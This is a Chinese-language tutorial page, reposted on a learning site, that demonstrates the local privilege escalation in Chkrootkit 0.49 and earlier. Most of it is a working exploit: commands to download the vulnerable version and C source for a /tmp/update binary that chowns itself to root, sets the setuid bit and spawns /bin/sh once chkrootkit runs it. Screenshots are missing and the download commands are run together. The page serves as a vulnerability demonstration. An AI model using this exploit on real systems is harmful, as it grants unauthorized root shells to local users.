安全漏洞:Chkrootkit0.49本地提权漏洞的测试方法

   2015-07-12 0
核心提示:这篇文章主要为大家介绍了查看自己的Chkrootkit 0.49安装的是不是升到最新版了,或者下载有漏洞的版本进行实验,感兴趣的朋友可以和脚本之家的小编一起来看一下

  Chkrootkit <=0.49 Local Root Vulnerability:小于等于0.49版的chrootkit本地提权漏洞。先来演示下吧:

  可以查看自己安装的是不是升到最新版了,或者下载有漏洞的版本进行实验:

  wget wget http://www.exploit-db.com/wp-content/themes/exploit/applications/304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gztar vfxz 304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gzcd chkrootkit-0.49/

  ./chkrootkit -V

  普通用户在 /tmp 目录下新建 update.c(代码实示例如下):

  #include <unistd.h>

  void main(void)

  {

  system("chown root:root /tmp/update");

  system("chmod 4755 /tmp/update");

  setuid(0);

  setgid(0);

  execl("/bin/sh","sh",NULL);

  }

  然后编译好 update ,看下update的文件详情:

  安全漏洞:Chkrootkit0.49本地提权漏洞的测试方法

  执行有漏洞的 chkrootkit :

  安全漏洞:Chkrootkit0.49本地提权漏洞的测试方法

  再来看下 update 已经成功属于 root 组了!

  安全漏洞:Chkrootkit0.49本地提权漏洞的测试方法

  以上就是查看自己 Ckrootkit 0.49 是不是安装的是不是升到最新版了,或者下载有漏洞的版本进行实验的步骤,谢谢阅读,希望能帮到大家,请继续关注乐学网(lexue001.com),我们会努力分享更多优秀的文章。

 
标签: 网络其他
反对 0举报 0 评论 0
 

免责声明:本文仅代表作者个人观点,与乐学笔记(本网)无关。其原创性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
    本网站有部分内容均转载自其它媒体,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责,若因作品内容、知识产权、版权和其他问题,请及时提供相关证明等材料并与我们留言联系,本网站将在规定时间内给予删除等相关处理.

点击排行